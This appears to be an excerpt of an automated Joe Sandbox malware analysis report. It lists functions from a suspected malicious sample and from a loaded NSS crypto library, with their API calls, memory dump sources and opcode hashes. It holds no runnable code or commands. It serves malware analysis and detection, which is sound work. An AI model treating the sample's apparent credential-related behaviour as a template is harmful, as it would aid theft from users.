                                                                                                                                                                                                                            Function 004184F0 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: dbcf5807354935c099b246365ce72428d553c4c68595e648a37f66ce42f6b6b1
                                                                                                                                                                                                                            • Instruction ID: 2b27e9389a8232f4358a9b7386cf030b2945d5c3441bdf10b1608c946d605a82
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbcf5807354935c099b246365ce72428d553c4c68595e648a37f66ce42f6b6b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1514F31D01201BBCB717BAE8549AFAB2E6EFB0318B14049FF414AA2769F2D8DC45D5D
                                                                                                                                                                                                                            Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c96dba7d2176548813934cd4752c0dec6ffeda168b931416bfbb007fd47364fb
                                                                                                                                                                                                                            • Instruction ID: 6388f4461eef54f9e8a11e2a77b8a0ea95f6d38d64ecf6345b785b7c3698f7fe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96dba7d2176548813934cd4752c0dec6ffeda168b931416bfbb007fd47364fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A318F71D0C2149FDF16DF55D9408AEBBB1EF84354B20816BE410B7391D738AE81DB9A
                                                                                                                                                                                                                            Function 00411D91 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1699248803-0
                                                                                                                                                                                                                            • Opcode ID: 17c493d39a80e18ede87925d05e44b937369a9fceefbaf054919a544ef5e8e25
                                                                                                                                                                                                                            • Instruction ID: 37defdeadf5e2a7b2b3ab4b6ac9d2f2b813142b5edc5aae0dc3332f1f74c3728
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17c493d39a80e18ede87925d05e44b937369a9fceefbaf054919a544ef5e8e25
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F01D71E0025DABDB15DF68DC909AEB7FCEB48204F0005BAA905D3241DA34AF458B94
                                                                                                                                                                                                                            Function 00411D67 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: 5bd9dccb6b3b3ada47ed5805296656baf1afb4dfc64e1a8b5f95435fe6bc619a
                                                                                                                                                                                                                            • Instruction ID: ddb6e52d0ff1f1191deb47ea6c0d9b73f3e49b1a14ce765bc69ad84851da93f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bd9dccb6b3b3ada47ed5805296656baf1afb4dfc64e1a8b5f95435fe6bc619a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AD05E31240138578B1457A9EC055DABB08DB017B5F001222FA69921B0C365AE9282C4
                                                                                                                                                                                                                            Function 00412516 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 0041254C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileOperation
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3080627654-0
                                                                                                                                                                                                                            • Opcode ID: 4db8ebf57bc6107b71b5ba4193d59d5f03bca1d24e9a0919771ad3cddd4420d4
                                                                                                                                                                                                                            • Instruction ID: eaea2de8574f2c4140e53920b4a13b58a368e230bb1e65c66a238f6e4d3fc1a7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db8ebf57bc6107b71b5ba4193d59d5f03bca1d24e9a0919771ad3cddd4420d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABE075B0D0420E9FCF44EFA596152DDBAF4AB48308F00916AC115F2240E3B482058BA9
                                                                                                                                                                                                                            Function 0041C372 Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                                                                                            • Opcode ID: 493a35f909d201759c05811b0783fd6409673068aaaac69e2073ebd1e81572ae
                                                                                                                                                                                                                            • Instruction ID: c2910aac78a4d1c0d0fc858b8a2476ce5a7129681263563ecaa76da9588f87e4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 493a35f909d201759c05811b0783fd6409673068aaaac69e2073ebd1e81572ae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB211674200714CFC320DF6ED484996B7F5FF49328B14486EEA8A8B722D776E881CB15
                                                                                                                                                                                                                            Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                                                                                            • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                                                                            • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 6CBC7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBC7C33
                                                                                                                                                                                                                            • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CBC7C66
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CBC7D1E
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: SECOID_FindOID_Util.NSS3(?,?,?,6CBC91C5), ref: 6CBC788F
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBC7D48
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CBC7D71
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CBC7DD3
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBC7DE1
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBC7DF8
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CBC7E1A
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CBC7E58
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC91C5), ref: 6CBC78BB
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CBC91C5), ref: 6CBC78FA
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CBC91C5), ref: 6CBC7930
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CBC91C5), ref: 6CBC7951
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBC7964
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBC797A
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CBC7988
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CBC7998
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: free.MOZGLUE(00000000), ref: 6CBC79A7
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CBC91C5), ref: 6CBC79BB
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PR_GetCurrentThread.NSS3(?,?,?,?,6CBC91C5), ref: 6CBC79CA
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBC7E49
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBC7F8C
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CBC7F98
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBC7FBF
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CBC7FD9
                                                                                                                                                                                                                            • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CBC8038
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CBC8050
                                                                                                                                                                                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CBC8093
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3 ref: 6CBC7F29
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CBC8072
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3 ref: 6CBC80F5
                                                                                                                                                                                                                              • Part of subcall function 6CBCBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CBC800A,00000000,?,00000000,?), ref: 6CBCBC3F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2815116071-0
                                                                                                                                                                                                                            • Opcode ID: 9c26ad2b71bc40f799d60c8dabbd57dcc8be15efcf92f6e6a33daa86cb3f0c36
                                                                                                                                                                                                                            • Instruction ID: 4d6639aa829bc96ba3960fef4af91aea878db5334c77b1e5faa0c6e58fb47ef8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c26ad2b71bc40f799d60c8dabbd57dcc8be15efcf92f6e6a33daa86cb3f0c36
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE18FB17083819FD710CF29C880B6A77E5EF44308F14496DE99AABB51E772E805CB93
                                                                                                                                                                                                                            Function 6CB51C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CB51C6B
                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CB51C75
                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CB51CA1
                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 6CB51CA9
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000000), ref: 6CB51CB4
                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CB51CCC
                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CB51CE4
                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 6CB51CEC
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000000), ref: 6CB51CFD
                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CB51D0F
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CB51D17
                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 6CB51D4D
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 6CB51D73
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CB51D7F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CB51D7A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                            • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                            • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                            • Opcode ID: 21e05185374b632e63b64b27a7f80a6fba4e598fdb6e1c1eaf5ae26e2f838984
                                                                                                                                                                                                                            • Instruction ID: 5d70e4864cf6e8494973144f2b4f9606e0abfbc8bd07492d5ca22bc7b64b4a83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21e05185374b632e63b64b27a7f80a6fba4e598fdb6e1c1eaf5ae26e2f838984
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA317AB1A002189FEF11DFA4DC48BAA7BB8FF4A345F044169F509D2150E73059D4CF69
